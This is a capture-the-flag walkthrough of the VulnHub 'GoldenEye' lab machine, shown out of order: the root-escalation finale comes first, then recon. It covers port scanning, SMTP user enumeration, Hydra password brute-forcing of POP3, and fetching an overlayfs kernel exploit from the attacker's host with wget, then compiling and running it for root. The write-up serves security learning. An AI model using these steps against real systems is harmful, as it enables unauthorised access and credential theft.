------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
hmm lets have a look... I've used this one before. However, it relies on gcc for compiling.
Based on the message I read earlier, quick google: "freebsd gcc equivalent clang"
https://unix.stackexchange.com/questions/49906/why-is-freebsd-deprecating-gcc-in-favor-of-clang-llvm
After briefly reading, it seems clang is a compatible compiler... Hmm lets try this!
Host it on my kali machine:
root@kali:~/Documents/vulnhub/goldeneye# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Documents/vulnhub/goldeneye# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Download and compile:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292.c
wget http://192.168.111.129/37292.c
--2018-08-19 02:52:53-- http://192.168.111.129/37292.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
100%[======================================>] 5,119 --.-K/s in 0s
2018-08-19 02:52:53 (1013 MB/s) - '37292.c' saved [5119/5119]
www-data@ubuntu:/tmp$ which cc
which cc
/usr/bin/cc
www-data@ubuntu:/tmp$ which clang
which clang
/usr/bin/clang
www-data@ubuntu:/tmp$ clang 37292.c -o a
clang 37292.c -o a
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls
ls
37292.c a vmware-root
www-data@ubuntu:/tmp$
Hmmm that looked easy?
Lets see?
www-data@ubuntu:/tmp$ ./a
./a
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
www-data@ubuntu:/tmp$
Hmm gcc not found? Let's check the exploit code...
Line 143:
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
I edit this and replace it with clang
Let's re-download that now:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292_edited.c
wget http://192.168.111.129/37292_edited.c
--2018-08-19 02:58:49-- http://192.168.111.129/37292_edited.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: '37292_edited.c'
100%[======================================>] 5,123 --.-K/s in 0s
2018-08-19 02:58:49 (10.9 MB/s) - '37292_edited.c' saved [5123/5123]
Recompile again:
www-data@ubuntu:/tmp$ clang 37292_edited.c -o b
clang 37292_edited.c -o b
37292_edited.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292_edited.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292_edited.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292_edited.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292_edited.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls -l
ls -l
total 76
-rw-rw-rw- 1 www-data www-data 5119 Aug 19 02:47 37292.c
-rw-rw-rw- 1 www-data www-data 5123 Aug 19 02:58 37292_edited.c
-rwxrwxrwx 1 www-data www-data 13773 Aug 19 02:53 a
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:58 a.out
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:59 b
drwxrwxrwx 5 www-data www-data 4096 Aug 19 02:54 ns_sploit
-rwxrwxrwx 1 www-data www-data 418 Aug 19 02:54 ofs-lib.c
drwx------ 2 root root 4096 Aug 19 01:19 vmware-root
Let's see what happens now:
www-data@ubuntu:/tmp$ ./b
./b
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
FINALLY! YES!!!!!
Now for the flag:
# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 19:28 .
drwxr-xr-x 22 root root 4096 Apr 24 21:57 ..
-rw-r--r-- 1 root root 19 May 3 10:08 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 11:00 .cache
-rw------- 1 root root 144 Apr 29 19:16 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 20:23 .rnd
-rw------- 1 root root 8296 Apr 29 10:18 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
Another one down.
I'm going to have to see how much a N64 goes for on eBay now!
--> n33dle
This one was fun. Some of the intial recon was more puzzle then real-world, but still enjoyable.
Initial compromise was via an exploit in the Moodle web application, then escalated to root through the infamous overlayfs Ubuntu/Linux Kernel exploit.
You can grab this vulnhub machine from here:
https://www.vulnhub.com/entry/goldeneye-1,240/
--> MISSION
The goal is to get root and capture the secret GoldenEye codes - flag.txt.
My target machine IP address is 192.168.111.128
--> REC0N / ENUMERATION
Let's start off with a full port scan:
root@kali:~# nmap -n -v -p- -T4 -sS 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:10 EDT
Initiating ARP Ping Scan at 06:10
Scanning 192.168.111.128 [1 port]
Completed ARP Ping Scan at 06:10, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:10
Scanning 192.168.111.128 [65535 ports]
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:10, 1.69s elapsed (65535 total ports)
Nmap scan report for 192.168.111.128
Host is up (0.00081s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
And a udp scan using udp-proto-scanner:
root@kali:~# udp-proto-scanner.pl 192.168.111.128
Starting udp-proto-scanner v1.1 ( http://labs.portcullis.co.uk/application/udp-proto-scanner ) on Tue Aug 14 06:13:07 2018
================================================================================
Bandwith: .................... 250k bits/second
Max Probes per host: ......... 3
Config file: ................. /usr/local/bin/udp-proto-scanner.conf
Probes names: ................ DNSStatusRequest,DNSVersionBindReq,NBTStat,NTPRequest,RPCCheck,SNMPv3GetRequest,chargen,citrix,daytime,db2,echo,gtpv1,ike,ms-sql,ms-sql-slam,netop,ntp,rpc,snmp-public,systat,tftp,time,xdmcp
================================================================================
Sending DNSStatusRequest probes to 1 hosts...
Sending DNSVersionBindReq probes to 1 hosts...
Sending NBTStat probes to 1 hosts...
Sending NTPRequest probes to 1 hosts...
Sending RPCCheck probes to 1 hosts...
Sending SNMPv3GetRequest probes to 1 hosts...
Sending chargen probes to 1 hosts...
Sending citrix probes to 1 hosts...
Sending daytime probes to 1 hosts...
Sending db2 probes to 1 hosts...
Sending echo probes to 1 hosts...
Sending gtpv1 probes to 1 hosts...
Sending ike probes to 1 hosts...
Sending ms-sql probes to 1 hosts...
Sending ms-sql-slam probes to 1 hosts...
Sending netop probes to 1 hosts...
Sending ntp probes to 1 hosts...
Sending rpc probes to 1 hosts...
Sending snmp-public probes to 1 hosts...
Sending systat probes to 1 hosts...
Sending tftp probes to 1 hosts...
Sending time probes to 1 hosts...
Sending xdmcp probes to 1 hosts...
Scan complete at Tue Aug 14 06:13:59 2018
I've got tcp/80, tcp/25, tcp/55006 and tcp/55007 to work with.
Let's check out the web page:
Cool little console animation plays. I check the source and the javascript that's running is terminal.js.
This holds something interesting in it's source!
var data = [ { GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" } ]; // //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes // var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent; var i = 0, isTag, text; (function type() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + `<span class='blinker'> </span>`; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) return type(); setTimeout(type, 60); })(); }
Whatever this is, it's encoded:
InvincibleHack3r
Through google I find it's HTML encoded. I run it through a decoding site which gives me:
InvincibleHack3r
Most likely creds!
So i try username boris and password InvincibleHack3r on http://192.168.111.128/sev-home/
We're in!
Nothing really to look at. So I go back to my nmap scan. This time I run a more aggressive scan on the discovered ports:
root@kali:~# nmap -n -v -p 25,80,55007,55006 -T4 -sS -A 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating Ping Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Completed Ping Scan at 06:36, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:36, 0.06s elapsed (4 total ports)
Initiating Service scan at 06:36
Scanning 4 services on 192.168.111.128
Completed Service scan at 06:36, 31.03s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.128
Initiating Traceroute at 06:36
Completed Traceroute at 06:36, 0.02s elapsed
NSE: Script scanning 192.168.111.128.
Initiating NSE at 06:36
Completed NSE at 06:37, 28.59s elapsed
Initiating NSE at 06:37
Completed NSE at 06:37, 0.01s elapsed
Nmap scan report for 192.168.111.128
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| Hello:
| 220 ubuntu GoldentEye SMTP Electronic-Mail agent
|_ Syntax: EHLO hostname
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA SASL(PLAIN) AUTH-RESP-CODE PIPELINING RESP-CODES UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES UIDL TOP STLS SASL(PLAIN) CAPA USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=8/14%Time=5B72B0A8%P=x86_64-pc-linux-gnu%r(Hell
SF:o,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r
SF:\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X|3.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
While I'm at it, I check boris and natalya are valid users through the SMTP vrfy function:
root@kali:~# nc -nv 192.168.111.128 25
(UNKNOWN) [192.168.111.128] 25 (smtp) open
EHLO hostname
220 ubuntu GoldentEye SMTP Electronic-Mail agent
250-ubuntu
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy boris
252 2.0.0 boris
vrfy natalya
252 2.0.0 natalya
vrfy doesnotexist
550 5.1.1 <doesnotexist>: Recipient address rejected: User unknown in local recipient table
vrfy bond
550 5.1.1 <bond>: Recipient address rejected: User unknown in local recipient table
vrfy james
550 5.1.1 <james>: Recipient address rejected: User unknown in local recipient table
I also run a nikto scan on the site... hmm nothing exciting:
root@kali:~/Documents/vulnhub/goldeneye# nikto -h http://192.168.111.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.111.128
+ Target Hostname: 192.168.111.128
+ Target Port: 80
+ Start Time: 2018-08-14 06:53:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time: 2018-08-14 06:53:44 (GMT-4) (0 seconds)
---------------------------------------------------------------------------
So I know boris and natalya are valid users. And I can see a pop3 mail system is hosted on tcp/55007. Except I need credentials. The brute-force tool Hydra has a pop3 module. I'll give that a shot with the fasttrack.txt password list. It's a smaller list instead of using the rockyou list.
First I put boris and natalya into a file:
root@kali:~/Documents/vulnhub/goldeneye# echo "boris" > goldeneye-users.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "natalya" >> goldeneye-users.txt
Now I kick off Hydra:
root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-14 07:04:04
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: boris password: secret1!
[STATUS] 85.00 tries/min, 255 tries in 00:03h, 189 to do in 00:03h, 16 active
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@kali:~/Documents/vulnhub/goldeneye# hydra -R
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[INFORMATION] reading restore file ./hydra.restore
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-14 07:08:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[55007][pop3] host: 192.168.111.128 login: natalya password: bird
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-14 07:09:08
Two successful passwords!
Now let's read their emails (if they have any?!).
See the following if you want to know how to read pop3 emails via telnet/nc:
https://www.pantz.org/software/pop3/pop3telnet.html
root@kali:~# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
.
quit
+OK Logging out.
Perhaps Xenia and admin are valid users?
Lets check Natalya's emails:
root@kali:~# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
quit
+OK Logging out.
Ok, so looks like xenia is a valid user. And some interesting notes here about another internal site.
As we don't have DNS, as per the email, we can add the internal domain hosted on Goldeneye as a host in our hosts file.
First I try using the IP, but as there is a redirect in place it's not possible. So I'll have to add it to my hosts file.
Just use echo and an append output redirect to /etc/hosts:
root@kali:~# echo "192.168.111.128 severnaya-station.com" >> /etc/hosts
Looks like it's working:
root@kali:~# curl severnaya-station.com/gnocertdir
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://severnaya-station.com/gnocertdir/">here</a>.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at severnaya-station.com Port 80</address>
</body></html>
Hmm what do we have here?!
Site backend looks to be running moodle. As per google "Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License"
Any exploits:
root@kali:~# searchsploit moodle
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit) | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection | exploits/php/webapps/41828.php
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | exploits/php/webapps/28770.txt
Moodle Help Script 1.x - Cross-Site Scripting | exploits/php/webapps/24279.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Just a few :)
Might be some interesting things to try here. RFI and RCE. But first I'll have a look around on the page. I have those xenia creds that'll probably come in use somewhere...
The intro to Goldeneye link takes me to a login page:
The xenia credentials work!
There's a message for Xenia from Dr. Doak. Let's check that out.
Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.
My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
Ok, another username. doak.
I don't have creds, but perhaps I should try adding doak and even the user 'admin' to another hydra attack.
I'll put them into another users file:
root@kali:~/Documents/vulnhub/goldeneye# echo "doak" > goldeneye-users2.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "admin" >> goldeneye-users2.txt
I look around the site. There's nothing in terms of courses/blogs or any other info/intel of use.
Based on the message above, perhaps confirming the xenia account will open up some possibilities?
Kick off another hydra...
root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users2.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-16 22:27:09
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: doak password: goat
Oh wow... that worked. Let's see if there's anything interesting in doak's mail...
root@kali:~/Documents/vulnhub/goldeneye# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
quit
+OK Logging out.
root@kali:~/Documents/vulnhub/goldeneye#
Sure enough, we have more creds! Lets try and login to the moodle site using these creds.
We're in!
So looking around the site, couldn't find anything, then I came across a folder called 'for james' which contained a s3cret.txt file.
It's contents:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
So I navigate to that url:
Haha nice. But what do we have here? Perhaps 486 is something? Or maybe the jpeg has some embedded info? Let's see...
Download it:
root@kali:~/Documents/vulnhub/goldeneye# wget http://severnaya-station.com//dir007key/for-007.jpg
--2018-08-16 22:37:28-- http://severnaya-station.com//dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 192.168.111.128
Connecting to severnaya-station.com (severnaya-station.com)|192.168.111.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
